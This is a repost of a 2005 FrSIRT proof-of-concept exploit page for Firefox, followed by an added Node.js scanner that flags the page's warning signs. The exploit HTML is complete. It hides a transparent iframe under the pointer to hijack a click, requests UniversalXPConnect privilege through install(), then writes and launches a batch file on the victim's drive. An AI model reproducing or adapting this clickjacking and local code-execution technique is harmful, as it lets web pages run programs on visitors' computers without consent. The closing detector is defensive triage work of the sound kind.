From FrSIRT.

Code:
------------------------------------- exploit.htm -------------------------------------
// FrSIRT Comment - This is a 0day exploit/vulnerability (unpatched)
// If a user clicks anywhere on a specially crafted page, this code will
// automatically create and execute a malicious batch/exe file.
//
// Update (08.05.2005) - The Mozilla Foundation patched (partially) this
// issue on the server side by adding random letters and numbers to the
// install function, which will prevent this exploit from working.

<html><head><title>firefox 0day exploit</title>
<body>Click anywhere inside this page<br>
<br>Advisory - http://www.frsirt.com/english/advisories/2005/0493<br>
<iframe onload="loader()" src="javascript:'<noscript>'+eval('if (window.name!=\'stealcookies\')
{window.name=\'stealcookies\';} else{ event={target:{href:\'http://ftp.mozilla.org/pub/
mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'}};install(event,\'You are
vulnerable!!!\',\'javascript:eval(\\\'netscape.security.PrivilegeManager.enablePrivilege(\\\\\\\'
UniversalXPConnect\\\\\\\');file=Components.classes[\\\\\\\'@mozilla.org/file/local;1\\\\\\\'].
createInstance(Components.interfaces.nsILocalFile);file.initWithPath(\\\\\\\'c:\\\\\\\\\\\\\\\\
booom.bat\\\\\\\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);
outputStream=Components.classes[\\\\\\\'@mozilla.org/network/file-output-stream;1\\\\\\\'].
createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init(file,0x04|0x08
|0x20,420,0);output=\\\\\\\'@ECHO off\\\\\\\\ncls\\\\\\\\nECHO malicious commands here...
\\\\\\\\nPAUSE\\\\\\\';outputStream.write(output,output.length);outputStream.close();file.launch();
\\\')\'); }')+'</noscript><a href=\'https://addons.update.mozilla.org/extensions/moreinfo.php?
id=220&application=firefox\' style=\'cursor:default;\'></'+'a>'"
id="targetframe" scrolling="no" frameborder="0" marginwidth="0" marginheight=0" style=
"position:absolute; left:0px; width:0px; height:6px; width:6px; margin:0px; padding:0px;
-moz-opacity:0"></iframe>
<script language="JavaScript" type="text/javascript">
document.onmousemove = function trackMouse(e) {
  document.getElementById("targetframe").style.left = (e.pageX-3)+"px"
  document.getElementById("targetframe").style.top = (e.pageY-3)+"px"
}
var counter = 0;
function loader() {
  counter++
  if(counter == 1) {
    stealcookies.focus()
  } else if(counter == 2) {
    stealcookies.history.go(-1)
    //targetframe.style.display="none";
  }
}
</script>
</body>
</html>




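Added example, not part of the original post or of the FrSIRT code: a static triage check in JavaScript (Node) that flags the indicators visible in the page above, namely an iframe with a javascript: source, a fully transparent element, an element repositioned under the pointer on mouse move, and the UniversalXPConnect privilege request. The function name, indicator ids and sample strings are constructed for illustration.

```javascript
// Added example: heuristic static triage of untrusted HTML for the indicators
// seen in the page above. Regex matching only, not a full HTML/JS parser.
const INDICATORS = [
  // iframe whose document is generated by a javascript: URL
  { id: 'iframe-javascript-src',
    re: /<iframe\b[^>]*?\bsrc\s*=\s*["']?\s*javascript:/i },
  // fully transparent element (opacity exactly 0, incl. legacy -moz-opacity)
  { id: 'invisible-overlay',
    re: /(?:-moz-)?opacity\s*:\s*0(?:\.0+)?\s*(?:[;"']|$)/i },
  // mousemove handler that moves an element to the pointer position
  { id: 'cursor-following-element',
    re: /onmousemove[\s\S]{0,400}?\.style\.(?:left|top)\s*=[^;\n]*page[XY]/i },
  // script asking for elevated XPConnect privileges
  { id: 'xpconnect-privilege-request',
    re: /netscape\.security\.PrivilegeManager\.enablePrivilege/i },
  // local file object that is later launched
  { id: 'local-file-launch',
    re: /nsILocalFile[\s\S]*?\.launch\s*\(/i },
];

// Returns the matched indicator ids and a verdict: clean, review or block.
function scanPage(html) {
  const hits = INDICATORS.filter((i) => i.re.test(html)).map((i) => i.id);
  const has = (id) => hits.includes(id);
  // Invisible element kept under the cursor: any click lands on hidden content.
  const hiddenClickTarget =
    has('invisible-overlay') && has('cursor-following-element');
  // Privileged file-system code delivered through a javascript: iframe.
  const privilegedFrame = has('iframe-javascript-src') &&
    (has('xpconnect-privilege-request') || has('local-file-launch'));
  let verdict = hits.length ? 'review' : 'clean';
  if (hiddenClickTarget || privilegedFrame) verdict = 'block';
  return { hits, verdict };
}

// Constructed, non-functional samples (not taken from the page).
const SAMPLE_SUSPICIOUS = [
  '<iframe id="f" src="javascript:\'\'" style="position:absolute; -moz-opacity:0"></iframe>',
  '<script>document.onmousemove = function (e) {',
  '  document.getElementById("f").style.left = (e.pageX-3)+"px"',
  '}</script>',
].join('\n');
const SAMPLE_BENIGN =
  '<iframe src="https://example.org/widget" style="opacity:0.9"></iframe>';

console.log(scanPage(SAMPLE_SUSPICIOUS));
console.log(scanPage(SAMPLE_BENIGN));
```

A "review" verdict means a single indicator matched on its own; the patterns are heuristics and obfuscated markup will need a real parser.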